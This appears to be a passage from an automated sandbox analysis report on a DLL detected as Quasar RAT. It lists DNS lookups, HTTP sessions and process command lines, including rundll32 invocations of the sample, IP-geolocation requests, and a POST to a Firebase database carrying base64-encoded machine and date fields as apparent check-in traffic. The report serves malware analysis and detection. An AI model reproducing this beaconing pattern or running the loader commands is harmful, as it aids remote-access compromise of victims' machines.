Jul 15, 2024 21:18:47.195360899 CEST  1.1.1.1    192.168.2.4  0x6e3d    No error (0)  argentina-e4162-default-rtdb.firebaseio.com         34.120.160.131  A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:47.195360899 CEST  1.1.1.1    192.168.2.4  0x6e3d    No error (0)  argentina-e4162-default-rtdb.firebaseio.com         35.201.97.85    A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:48.043981075 CEST  1.1.1.1    192.168.2.4  0x4173    No error (0)  telize.com                                          88.198.193.213  A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:48.750442982 CEST  1.1.1.1    192.168.2.4  0xabd9    No error (0)  www.telize.com                                      88.198.193.213  A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:50.744122028 CEST  1.1.1.1    192.168.2.4  0x6261    No error (0)  freegeoip.net                                       3.33.130.190    A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:50.744122028 CEST  1.1.1.1    192.168.2.4  0x6261    No error (0)  freegeoip.net                                       15.197.148.33   A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:52.150810957 CEST  1.1.1.1    192.168.2.4  0x54d     No error (0)  api.ipify.org                                       104.26.12.205   A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:52.150810957 CEST  1.1.1.1    192.168.2.4  0x54d     No error (0)  api.ipify.org                                       104.26.13.205   A (IP address)  IN (0x0001)  false
Jul 15, 2024 21:18:52.150810957 CEST  1.1.1.1    192.168.2.4  0x54d     No error (0)  api.ipify.org                                       172.67.74.152   A (IP address)  IN (0x0001)  false
                                  • argentina-e4162-default-rtdb.firebaseio.com
                                  • www.telize.com
                                  • telize.com
                                  • freegeoip.net
                                  • api.ipify.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49738 | 88.198.193.213 | 80 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:18:48.055237055 CEST | 144 | OUT | GET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: telize.com
                                  Connection: Keep-Alive
Jul 15, 2024 21:18:48.736191988 CEST | 403 | IN | HTTP/1.1 301 Moved Permanently
                                  Server: nginx
                                  Date: Mon, 15 Jul 2024 19:18:48 GMT
                                  Content-Type: text/html
                                  Content-Length: 162
                                  Connection: keep-alive
                                  Location: https://www.telize.com/geoip
                                  Strict-Transport-Security: max-age=63072000
                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49745 | 3.33.130.190 | 80 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:18:50.749778032 CEST | 146 | OUT | GET /xml/ HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: freegeoip.net
                                  Connection: Keep-Alive
Jul 15, 2024 21:18:52.127656937 CEST | 259 | IN | HTTP/1.1 200 OK
                                  Server: openresty
                                  Date: Mon, 15 Jul 2024 19:18:52 GMT
                                  Content-Type: text/html
                                  Content-Length: 114
                                  Connection: keep-alive
                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                  Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander"}</script></head></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49747 | 104.26.12.205 | 80 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
Jul 15, 2024 21:18:52.156512976 CEST | 142 | OUT | GET / HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: api.ipify.org
                                  Connection: Keep-Alive
Jul 15, 2024 21:18:52.622903109 CEST | 227 | IN | HTTP/1.1 200 OK
                                  Date: Mon, 15 Jul 2024 19:18:52 GMT
                                  Content-Type: text/plain
                                  Content-Length: 11
                                  Connection: keep-alive
                                  Vary: Origin
                                  CF-Cache-Status: DYNAMIC
                                  Server: cloudflare
                                  CF-RAY: 8a3c19d27b8d4326-EWR
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 34.120.206.254 | 443 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-15 19:18:47 UTC | 192 | OUT | POST /user.json HTTP/1.1
                                  Content-Type: application/json; charset=utf-8
                                  Host: argentina-e4162-default-rtdb.firebaseio.com
                                  Content-Length: 76
                                  Expect: 100-continue
                                  Connection: Keep-Alive
2024-07-15 19:18:48 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-07-15 19:18:48 UTC | 1 | OUT | Data Raw: 7b
                                  Data Ascii: {
2024-07-15 19:18:48 UTC | 75 | OUT | Data Raw: 22 4d 41 51 55 49 4e 41 22 3a 22 4e 7a 59 77 4e 6a 4d 35 22 2c 22 44 41 54 41 22 3a 22 4d 54 55 75 4d 44 63 75 4d 6a 41 79 4e 43 41 78 4e 54 6f 78 4f 44 6f 30 4e 51 3d 3d 22 2c 22 50 4c 55 47 49 4e 22 3a 22 4d 41 3d 3d 22 7d
                                  Data Ascii: "MAQUINA":"NzYwNjM5","DATA":"MTUuMDcuMjAyNCAxNToxODo0NQ==","PLUGIN":"MA=="}
2024-07-15 19:18:48 UTC | 318 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Mon, 15 Jul 2024 19:18:48 GMT
                                  Content-Type: application/json; charset=utf-8
                                  Content-Length: 31
                                  Connection: close
                                  Access-Control-Allow-Origin: *
                                  Cache-Control: no-cache
                                  Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                  {"name":"-O1rpJvS_Y5GLoZkQlTi"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49740 | 88.198.193.213 | 443 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-15 19:18:49 UTC | 148 | OUT | GET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: www.telize.com
                                  Connection: Keep-Alive


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49743 | 88.198.193.213 | 443 | 2840 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-07-15 19:18:50 UTC | 148 | OUT | GET /geoip HTTP/1.1
                                  User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0
                                  Host: www.telize.com
                                  Connection: Keep-Alive



                                  Target ID:0
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\loaddll64.exe
                                  Wow64 process (32bit):false
                                  Commandline:loaddll64.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll"
                                  Imagebase:0x7ff6eccd0000
                                  File size:165'888 bytes
                                  MD5 hash:763455F9DCB24DFEECC2B9D9F8D46D52
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:1
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff7699e0000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:2
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\cmd.exe
                                  Wow64 process (32bit):false
                                  Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                  Imagebase:0x7ff7699e0000
                                  File size:289'792 bytes
                                  MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  Target ID:3
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixDoubleSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1702356382.000002371EFB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1703302239.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:4
                                  Start time:15:18:29
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",#1
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1702280446.0000017CCA232000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000004.00000002.1703297864.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:5
                                  Start time:15:18:32
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_FixSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1729906045.0000013FFD192000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1730594231.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:6
                                  Start time:15:18:35
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe C:\Users\user\Desktop\vstdlib_s64.dll.dll,V_IsAbsolutePath
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1760309078.000001D941D42000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000006.00000002.1761110058.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:7
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixDoubleSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1808931782.000001AB44DF2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000007.00000002.1817877407.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:8
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_FixSlashes
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1815878708.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000008.00000002.1808109707.000001DBF6FC2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:9
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_IsAbsolutePath
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1814452255.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000009.00000002.1806920256.0000021EF74E2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:10
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_vsnwprintf
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1808027443.0000018EB8A12000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000A.00000002.1815867810.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:11
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncpy
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1812688068.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000B.00000002.1805370892.000002B1ACFD2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Reputation:high
                                  Has exited:true

                                  Target ID:12
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat_length
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1813780410.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000C.00000002.1806280015.000002113B832000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:13
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_strncat
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1811295481.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000D.00000002.1803990209.0000020FEDBB2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:14
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_snprintf
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1812477246.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000E.00000002.1805176816.00000168E3952000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:15
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF8ToUTF16
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1813216176.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 0000000F.00000002.1804903406.000001EDD23B2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:true

                                  Target ID:16
                                  Start time:15:18:38
                                  Start date:15/07/2024
                                  Path:C:\Windows\System32\rundll32.exe
                                  Wow64 process (32bit):false
                                  Commandline:rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_UTF16ToUTF8
                                  Imagebase:0x7ff722680000
                                  File size:71'680 bytes
                                  MD5 hash:EF3179D498793BF4234F708D3BE28633
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.3552909524.000001B080DF2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000010.00000002.3557919127.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                  Has exited:false

Target ID: 17
Start time: 15:18:38
Start date: 15/07/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripTrailingSlash
Imagebase: 0x7ff722680000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1812687849.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000011.00000002.1805367986.0000021A9FE12000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Has exited: true

Target ID: 18
Start time: 15:18:38
Start date: 15/07/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_StripLastDir
Imagebase: 0x7ff722680000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1811783648.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000012.00000002.1804504731.000001D6442D2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Has exited: true

Target ID: 19
Start time: 15:18:38
Start date: 15/07/2024
Path: C:\Windows\System32\rundll32.exe
Wow64 process (32bit): false
Commandline: rundll32.exe "C:\Users\user\Desktop\vstdlib_s64.dll.dll",V_RemoveDotSlashes
Imagebase: 0x7ff722680000
File size: 71'680 bytes
MD5 hash: EF3179D498793BF4234F708D3BE28633
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1812533280.00007FFDFB3A2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
• Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000013.00000002.1805248245.000001DA7ABE2000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Has exited: true

No disassembly